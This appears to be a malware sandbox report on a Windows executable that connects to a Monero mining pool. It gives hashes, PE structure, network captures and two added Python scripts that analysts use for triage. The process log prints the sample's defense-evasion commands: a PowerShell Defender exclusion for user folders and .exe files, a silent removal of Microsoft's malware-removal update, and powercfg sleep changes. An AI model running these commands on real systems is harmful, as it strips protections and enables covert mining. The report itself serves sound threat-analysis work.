                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):14544
                                                    Entropy (8bit):6.2660301556221185
                                                    Encrypted:false
                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                    Joe Sandbox View:
• Filename: 0kToM9fVGQ.exe, Detection: malicious
• Filename: m2.exe, Detection: malicious
• Filename: ICBM-noml.exe, Detection: malicious
• Filename: rtYpMDeKUq.exe, Detection: malicious
• Filename: n7ZKbApaa3.dll, Detection: malicious
• Filename: ICBM.exe, Detection: malicious
• Filename: PqSIlYOaIF.exe, Detection: malicious
• Filename: NH95Vhokye.exe, Detection: malicious
• Filename: Eulen.exe, Detection: malicious
• Filename: U9jAFGWgPG.exe, Detection: malicious
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Entropy (8bit):6.533928160435543
                                                    TrID:
                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                    • DOS Executable Generic (2002/1) 0.92%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:4o8Tgrb384.exe
                                                    File size:2'629'632 bytes
                                                    MD5:ee26108b32d7b5e5c1f47e51fd11dba2
                                                    SHA1:0744a751814fe469254d4d8336f32243f8e1b395
                                                    SHA256:414d3083ff99da1b26c198f1bcea1b5824f8a083fd57420781e21e539b5bbf1b
                                                    SHA512:cf9dd0018b0c6e3c0358455ed8d6544b0acc4b5e499fc106dcca76529edfbca473ddf3b683013eee426852a6e6abf0f5f72d475d6c22b739f78d7c50c4d4f53c
                                                    SSDEEP:49152:Vx7T+hZhCasw5syglLJfRY3cSBfqzfp8iu390S8IZKO6Ny:fuZ8Bisy6ZHSpqrpnu39DLj
                                                    TLSH:C4C533D25C2421F4DA8E10F958651F813F2DB466AB7C71EF91E02F6431A7EE6293E4C2
                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....0:g.........."......|....'.....@..........@..............................(...........`........................................
                                                    Icon Hash:00928e8e8686b000
                                                    Entrypoint:0x140001140
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x140000000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x673A30B7 [Sun Nov 17 18:06:47 2024 UTC]
                                                    TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:de41d4e0545d977de6ca665131bb479a
                                                    Instruction
                                                    dec eax
                                                    sub esp, 28h
                                                    dec eax
                                                    mov eax, dword ptr [00007ED5h]
                                                    mov dword ptr [eax], 00000001h
                                                    call 00007F032D09370Fh
                                                    nop
                                                    nop
                                                    nop
                                                    dec eax
                                                    add esp, 28h
                                                    ret
                                                    nop
                                                    inc ecx
                                                    push edi
                                                    inc ecx
                                                    push esi
                                                    push esi
                                                    push edi
                                                    push ebx
                                                    dec eax
                                                    sub esp, 20h
                                                    dec eax
                                                    mov eax, dword ptr [00000030h]
                                                    dec eax
                                                    mov edi, dword ptr [eax+08h]
                                                    dec eax
                                                    mov esi, dword ptr [00007EC9h]
                                                    xor eax, eax
                                                    dec eax
                                                    cmpxchg dword ptr [esi], edi
                                                    sete bl
                                                    je 00007F032D093730h
                                                    dec eax
                                                    cmp edi, eax
                                                    je 00007F032D09372Bh
                                                    dec esp
                                                    mov esi, dword ptr [00009659h]
                                                    nop word ptr [eax+eax+00000000h]
                                                    mov ecx, 000003E8h
                                                    inc ecx
                                                    call esi
                                                    xor eax, eax
                                                    dec eax
                                                    cmpxchg dword ptr [esi], edi
                                                    sete bl
                                                    je 00007F032D093707h
                                                    dec eax
                                                    cmp edi, eax
                                                    jne 00007F032D0936E9h
                                                    dec eax
                                                    mov edi, dword ptr [00007E90h]
                                                    mov eax, dword ptr [edi]
                                                    cmp eax, 01h
                                                    jne 00007F032D09370Eh
                                                    mov ecx, 0000001Fh
                                                    call 00007F032D09ADD4h
                                                    jmp 00007F032D093729h
                                                    cmp dword ptr [edi], 00000000h
                                                    je 00007F032D09370Bh
                                                    mov byte ptr [002817C9h], 00000001h
                                                    jmp 00007F032D09371Bh
                                                    mov dword ptr [edi], 00000001h
                                                    dec eax
                                                    mov ecx, dword ptr [00007E7Ah]
                                                    dec eax
                                                    mov edx, dword ptr [00007E7Bh]
                                                    call 00007F032D09ADCBh
                                                    mov eax, dword ptr [edi]
                                                    cmp eax, 01h
                                                    jne 00007F032D09371Bh
                                                    dec eax
                                                    mov ecx, dword ptr [00007E50h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa528 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x284000 | 0x180 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x287000 | 0x78 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x90a0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9410 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa6c0 | 0x158 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                     Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type            | Entropy            | Characteristics
                                                     .text  | 0x1000          | 0x7a26       | 0x7c00   | b8950986ec9ca7eb5e0cd1241a37ad7d | False    | 0.5051978326612904 | data                 | 6.173504517183848  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                     .rdata | 0x9000          | 0x1c70       | 0x1e00   | ea4e7223b34c5105ebffa3b9cf1caa34 | False    | 0.4427083333333333 | zlib compressed data | 4.597863869955318  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                     .data  | 0xb000          | 0x278860     | 0x277a00 | 6e256ed42cf8dc10b81b3415fa8f59f9 | unknown  | unknown            | unknown              | unknown            | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                     .pdata | 0x284000        | 0x180        | 0x200    | dfe97988d419ddba2193306146588841 | False    | 0.501953125        | data                 | 3.1188095408579493 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                     .00cfg | 0x285000        | 0x10         | 0x200    | b18c7380298e104adf73576fa46bccc1 | False    | 0.04296875         | data                 | 0.15127132530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                     .tls   | 0x286000        | 0x10         | 0x200    | bf619eac0cdf3f68d496ea9344137e8b | False    | 0.02734375         | data                 | 0.0                | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                     .reloc | 0x287000        | 0x78         | 0x200    | 518897bf9be51487bef33a20d04055b4 | False    | 0.224609375        | data                 | 1.418145014287425  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
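The section table above can be cross-checked against the reported file size without the sample in hand. The following is an added example, not part of the Joe Sandbox report: it takes the section table and the 2'629'632-byte file size exactly as reported, recomputes the raw file layout, reports whether any overlay (data appended after the last section) exists, checks that the sections tile the virtual image without gaps, and flags the section that dominates the file. The 0x400 header size and the 0x200 / 0x1000 alignments are assumptions inferred from the table, since the report does not list SizeOfHeaders or the alignment fields; the entropy the sandbox could not compute for .data is likewise out of reach here.

```python
# Added example: consistency checks on a PE section table as printed in a sandbox report.
# Values copied from the report for 4o8Tgrb384.exe; header size and alignments are assumptions.
FILE_SIZE = 2_629_632            # reported file size (0x282000)
SIZE_OF_HEADERS = 0x400          # assumption: SizeOfHeaders is not in the report
FILE_ALIGNMENT = 0x200           # assumption: every raw size in the table is a multiple of 0x200
SECTION_ALIGNMENT = 0x1000       # assumption: every virtual address in the table is 4 KiB aligned

SECTIONS = [
    # name,    virtual addr, virtual size, raw size, characteristics (abbreviated)
    (".text",  0x1000,   0x7a26,   0x7c00,   "CODE|EXECUTE|READ"),
    (".rdata", 0x9000,   0x1c70,   0x1e00,   "INITIALIZED_DATA|READ"),
    (".data",  0xb000,   0x278860, 0x277a00, "INITIALIZED_DATA|READ|WRITE"),
    (".pdata", 0x284000, 0x180,    0x200,    "INITIALIZED_DATA|READ"),
    (".00cfg", 0x285000, 0x10,     0x200,    "INITIALIZED_DATA|READ"),
    (".tls",   0x286000, 0x10,     0x200,    "INITIALIZED_DATA|READ|WRITE"),
    (".reloc", 0x287000, 0x78,     0x200,    "INITIALIZED_DATA|DISCARDABLE|READ"),
]


def align_up(value, alignment):
    return (value + alignment - 1) // alignment * alignment


def layout(sections=SECTIONS, headers=SIZE_OF_HEADERS, file_size=FILE_SIZE):
    """Assign raw file offsets in table order; anything past the last section is overlay."""
    offset = align_up(headers, FILE_ALIGNMENT)
    rows = []
    for name, _va, vsize, rsize, _chars in sections:
        rows.append({"name": name, "raw_offset": offset, "raw_size": rsize,
                     "share_of_file": rsize / file_size, "slack": rsize - vsize})
        offset += rsize
    return {"end_of_sections": offset, "overlay": file_size - offset, "sections": rows}


def virtual_contiguous(sections=SECTIONS, alignment=SECTION_ALIGNMENT):
    """True when each section starts at the next aligned address after the previous one."""
    for (_n, va, vsize, _r, _c), (_n2, next_va, _v2, _r2, _c2) in zip(sections, sections[1:]):
        if next_va != align_up(va + vsize, alignment):
            return False
    return True


def flags(sections=SECTIONS):
    """Triage observations that follow from the table alone."""
    out = []
    total_raw = sum(s[3] for s in sections)
    for name, _va, _vsize, rsize, chars in sections:
        if rsize / total_raw > 0.9 and "EXECUTE" not in chars:
            out.append(f"{name}: {rsize / total_raw:.1%} of the file in a non-executable section (embedded payload?)")
        if "EXECUTE" in chars and "WRITE" in chars:
            out.append(f"{name}: section is both writable and executable")
    return out


if __name__ == "__main__":
    info = layout()
    print(f"sections end at {info['end_of_sections']:#x}, overlay = {info['overlay']} bytes")
    print("virtual image contiguous:", virtual_contiguous())
    for line in flags():
        print("flag:", line)
```

For this sample the sections account for exactly the reported file size, so there is no overlay; the 2.5 MB .data section, for which the sandbox printed "unknown" in every content column, is where the bulk of the binary lives.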
                                                     DLL           Imports
                                                     msvcrt.dll    __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                     KERNEL32.dll  DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                                     Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
                                                     Nov 17, 2024 19:21:10.696918964 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:21:10.701951027 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:21:10.702033043 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:21:10.702296019 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:21:10.707089901 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:21:11.535377026 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:21:11.535396099 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:21:11.535481930 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:21:11.536799908 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:21:11.541696072 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:21:11.778882980 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:21:11.799969912 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:21:11.800049067 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:21:13.240889072 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:21:13.285979986 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:21:23.177860022 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:21:23.223416090 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:21:33.269067049 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:21:33.319525003 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:21:43.226334095 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:21:43.270272970 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:21:53.248210907 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:21:53.301625013 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:22:03.301476002 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:22:03.348673105 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:22:13.450011015 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:22:13.504698992 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:22:23.442322969 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:22:23.488934994 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:22:24.168209076 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:22:24.223300934 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:22:35.220432997 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:22:35.270200014 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:22:45.222867966 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:22:45.270288944 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:22:55.359702110 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:22:55.410763979 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Nov 17, 2024 19:23:05.249850035 CET | 10343       | 49705     | 51.89.23.91 | 192.168.2.8
                                                     Nov 17, 2024 19:23:05.301373959 CET | 49705       | 10343     | 192.168.2.8 | 51.89.23.91
                                                     Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
                                                     Nov 17, 2024 19:21:10.672990084 CET | 62092       | 53        | 192.168.2.8 | 1.1.1.1
                                                     Nov 17, 2024 19:21:10.682054996 CET | 53          | 62092     | 1.1.1.1     | 192.168.2.8
                                                     Timestamp                           | Source IP   | Dest IP | Trans ID | OP Code            | Name                 | Type           | Class       | DNS over HTTPS
                                                     Nov 17, 2024 19:21:10.672990084 CET | 192.168.2.8 | 1.1.1.1 | 0x84a6   | Standard query (0) | xmr-eu1.nanopool.org | A (IP address) | IN (0x0001) | false
                                                     Timestamp                           | Source IP | Dest IP     | Trans ID | Reply Code   | Name                 | CName | Address         | Type           | Class       | DNS over HTTPS
                                                     Nov 17, 2024 19:21:10.682054996 CET | 1.1.1.1   | 192.168.2.8 | 0x84a6   | No error (0) | xmr-eu1.nanopool.org |       | 51.15.65.182    | A (IP address) | IN (0x0001) | false
                                                     Nov 17, 2024 19:21:10.682054996 CET | 1.1.1.1   | 192.168.2.8 | 0x84a6   | No error (0) | xmr-eu1.nanopool.org |       | 51.15.193.130   | A (IP address) | IN (0x0001) | false
                                                     Nov 17, 2024 19:21:10.682054996 CET | 1.1.1.1   | 192.168.2.8 | 0x84a6   | No error (0) | xmr-eu1.nanopool.org |       | 51.15.58.224    | A (IP address) | IN (0x0001) | false
                                                     Nov 17, 2024 19:21:10.682054996 CET | 1.1.1.1   | 192.168.2.8 | 0x84a6   | No error (0) | xmr-eu1.nanopool.org |       | 141.94.23.83    | A (IP address) | IN (0x0001) | false
                                                     Nov 17, 2024 19:21:10.682054996 CET | 1.1.1.1   | 192.168.2.8 | 0x84a6   | No error (0) | xmr-eu1.nanopool.org |       | 162.19.224.121  | A (IP address) | IN (0x0001) | false
                                                     Nov 17, 2024 19:21:10.682054996 CET | 1.1.1.1   | 192.168.2.8 | 0x84a6   | No error (0) | xmr-eu1.nanopool.org |       | 54.37.232.103   | A (IP address) | IN (0x0001) | false
                                                     Nov 17, 2024 19:21:10.682054996 CET | 1.1.1.1   | 192.168.2.8 | 0x84a6   | No error (0) | xmr-eu1.nanopool.org |       | 51.89.23.91     | A (IP address) | IN (0x0001) | false
                                                     Nov 17, 2024 19:21:10.682054996 CET | 1.1.1.1   | 192.168.2.8 | 0x84a6   | No error (0) | xmr-eu1.nanopool.org |       | 146.59.154.106  | A (IP address) | IN (0x0001) | false
                                                     Nov 17, 2024 19:21:10.682054996 CET | 1.1.1.1   | 192.168.2.8 | 0x84a6   | No error (0) | xmr-eu1.nanopool.org |       | 212.47.253.124  | A (IP address) | IN (0x0001) | false
                                                     Nov 17, 2024 19:21:10.682054996 CET | 1.1.1.1   | 192.168.2.8 | 0x84a6   | No error (0) | xmr-eu1.nanopool.org |       | 54.37.137.114   | A (IP address) | IN (0x0001) | false
                                                     Nov 17, 2024 19:21:10.682054996 CET | 1.1.1.1   | 192.168.2.8 | 0x84a6   | No error (0) | xmr-eu1.nanopool.org |       | 163.172.154.142 | A (IP address) | IN (0x0001) | false
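The DNS answers and the TCP table together tell the story: the sample resolves xmr-eu1.nanopool.org, picks one of the returned addresses (51.89.23.91) and holds a single TCP session to port 10343, with the server pushing a packet roughly every ten seconds once the session is up. The following is an added example, not part of the Joe Sandbox report, of how an analyst joins those two tables: it attributes each TCP flow to a hostname through the DNS answers, normalises the client/server direction, and measures the inter-arrival time of server-to-client packets as a periodicity indicator. The DNS answers and all 39 TCP rows are copied from the report (same date, so only the time of day is kept and the timezone is dropped); the pool-domain watchlist and the expected-port set are assumptions standing in for a site's own lists.

```python
# Added example: attribute sandbox TCP flows to DNS names and measure server-side periodicity.
import statistics
from collections import defaultdict
from datetime import datetime

# DNS answers for xmr-eu1.nanopool.org, copied from the report's DNS answer table.
DNS_ANSWERS = [("xmr-eu1.nanopool.org", ip) for ip in (
    "51.15.65.182", "51.15.193.130", "51.15.58.224", "141.94.23.83", "162.19.224.121",
    "54.37.232.103", "51.89.23.91", "146.59.154.106", "212.47.253.124", "54.37.137.114",
    "163.172.154.142")]

# The two endpoints of the report's TCP table and every packet in it, in order.
C, S = ("192.168.2.8", 49705), ("51.89.23.91", 10343)


def pkt(t, frm, to):
    return (t, frm[0], frm[1], to[0], to[1])        # (time, src, sport, dst, dport)


TCP_PACKETS = [
    pkt("19:21:10.696918964", C, S), pkt("19:21:10.701951027", S, C), pkt("19:21:10.702033043", C, S),
    pkt("19:21:10.702296019", C, S), pkt("19:21:10.707089901", S, C), pkt("19:21:11.535377026", S, C),
    pkt("19:21:11.535396099", S, C), pkt("19:21:11.535481930", C, S), pkt("19:21:11.536799908", C, S),
    pkt("19:21:11.541696072", S, C), pkt("19:21:11.778882980", S, C), pkt("19:21:11.799969912", S, C),
    pkt("19:21:11.800049067", C, S), pkt("19:21:13.240889072", S, C), pkt("19:21:13.285979986", C, S),
    pkt("19:21:23.177860022", S, C), pkt("19:21:23.223416090", C, S), pkt("19:21:33.269067049", S, C),
    pkt("19:21:33.319525003", C, S), pkt("19:21:43.226334095", S, C), pkt("19:21:43.270272970", C, S),
    pkt("19:21:53.248210907", S, C), pkt("19:21:53.301625013", C, S), pkt("19:22:03.301476002", S, C),
    pkt("19:22:03.348673105", C, S), pkt("19:22:13.450011015", S, C), pkt("19:22:13.504698992", C, S),
    pkt("19:22:23.442322969", S, C), pkt("19:22:23.488934994", C, S), pkt("19:22:24.168209076", S, C),
    pkt("19:22:24.223300934", C, S), pkt("19:22:35.220432997", S, C), pkt("19:22:35.270200014", C, S),
    pkt("19:22:45.222867966", S, C), pkt("19:22:45.270288944", C, S), pkt("19:22:55.359702110", S, C),
    pkt("19:22:55.410763979", C, S), pkt("19:23:05.249850035", S, C), pkt("19:23:05.301373959", C, S),
]

MINING_POOL_SUFFIXES = ("nanopool.org",)    # assumption: a local watchlist of pool domains
EXPECTED_PORTS = {53, 80, 443}              # assumption: ports this host is expected to talk to


def parse_ts(t):
    """Sandbox timestamps carry nanoseconds; strptime's %f accepts at most six digits."""
    hms, frac = t.rsplit(".", 1)
    return datetime.strptime(f"{hms}.{frac[:6]}", "%H:%M:%S.%f")


def analyse(packets=TCP_PACKETS, dns_answers=DNS_ANSWERS):
    ip_to_names = defaultdict(set)
    for name, ip in dns_answers:
        ip_to_names[ip].add(name)
    flows = {}
    for t, src, sport, dst, dport in packets:
        # The server side is the endpoint a DNS answer pointed at; otherwise the lower port.
        server_is_dst = dst in ip_to_names or (src not in ip_to_names and dport < sport)
        key = (src, sport, dst, dport) if server_is_dst else (dst, dport, src, sport)
        f = flows.setdefault(key, {"c2s": 0, "s2c_times": []})
        if server_is_dst:
            f["c2s"] += 1
        else:
            f["s2c_times"].append(parse_ts(t))
    results = []
    for (client, _cport, server, sp), f in flows.items():
        times = f["s2c_times"]
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        names = sorted(ip_to_names.get(server, ()))
        results.append({
            "client": client, "server": server, "server_port": sp,
            "hostnames": names,
            "mining_pool": any(n.endswith(MINING_POOL_SUFFIXES) for n in names),
            "non_standard_port": sp not in EXPECTED_PORTS,
            "c2s_packets": f["c2s"], "s2c_packets": len(times),
            "median_s2c_gap_s": statistics.median(gaps) if gaps else None,
        })
    return results


if __name__ == "__main__":
    for r in analyse():
        print(r)
```

The median server-to-client gap comes out close to ten seconds because the handshake burst is a minority of the packets; a mean would be dragged down by it, which is why the median is the better periodicity statistic on short captures like this one.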

                                                    Target ID:0
                                                    Start time:13:21:02
                                                    Start date:17/11/2024
                                                    Path:C:\Users\user\Desktop\4o8Tgrb384.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\4o8Tgrb384.exe"
                                                    Imagebase:0x7ff67c750000
                                                    File size:2'629'632 bytes
                                                    MD5 hash:EE26108B32D7B5E5C1F47E51FD11DBA2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:13:21:02
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:13:21:02
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff705b20000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                    Imagebase:0x7ff7a5bf0000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                    Imagebase:0x7ff7a5bf0000
                                                    File size:96'256 bytes
                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:13:21:05
                                                    Start date:17/11/2024
                                                    Path:C:\Windows\System32\powercfg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                    Imagebase:0x7ff7a5bf0000
